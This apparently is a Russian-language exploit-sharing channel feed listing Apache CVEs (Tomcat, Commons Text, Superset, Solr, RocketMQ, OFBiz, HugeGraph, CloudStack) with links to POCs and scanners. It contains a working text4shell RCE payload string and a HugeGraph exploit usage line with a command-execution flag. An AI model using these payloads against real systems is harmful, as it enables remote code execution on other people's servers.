Apache Tomcat RCE (web shell)
Action

#apache #tomcat #shell

Apache Tomcat JMXProxy RCE
exploit
#exploit #rce #apache

CVE-2022-42889
Apache - Commons Text library
CVSS: 9.8 CRITICAL
Почитать про дырку тут

POC
Java:

StringSubstitutor.createInterpolator().replace("${script:js:new java.lang.ProcessBuilder(\"calc\").start()}");

#apache

CVE-2022-42889
Почитать про дырку тут
Сканер дырки на питоне text4shell-tools
Сканер дырки для BurpSuite burp-text4shell
Поиграться с дыркой в докере text4shell-docker
Сам POC

#apache #exploit #poc

CVE-2022-40146 exploit
Дыры в элементах управления безопасностью Apache Batik по умолчанию — SSRF и RCE через удаленную загрузку классов
What da fuck is this ? Read

#apache #rce #java

CVE-2023-27524
Apache Superset Auth Bypass
POC exploit

день бога я смотрю

#apache #poc

Apache Solr 8.3.1
admin panel RCE (Windows)
readme
exploit

#apache #exploit

CVE-2023-37582 EXPLOIT
Apache RocketMQ
*
Для теста присутствует RocketMQ environment via Docker
*
exploit
*
#apache #exploit #docker

CVE-2023-49070 - Apache ofbiz
pre-auth RCE POC

#apache

CVE-2024-27348 RCE в Apache HugeGraph Server
*
Usage:
python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"

*
POC exploit

#apache #rce

CVE-2024-41107
*
Apache CloudStack
*
Версии с 4.5.0 по 4.18.2.1 и с 4.19.0.0 по 4.19.0.2.
*
Дырка в механизме аутентификации SAML
*
Для админов\white: saml2.enabled заменить на saml2.false бгг))

#apache #saml

Apache OfBiz vulns
*
Полный набор: POCов, RCEёв, CURLов, Burpсьютов
(CVE-2024-32113 CVE-2024-36104 CVE-2024-38856)
*
// lInK*/

#apache

Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!
*
Или почему индеец пахнет гавной
*
Занятный writeup в котором:
3 types of Confusion Attacks
9 new vulnerabilities
20 exploitation techniques
*
BlackHat 2024 PDF
Link

#apache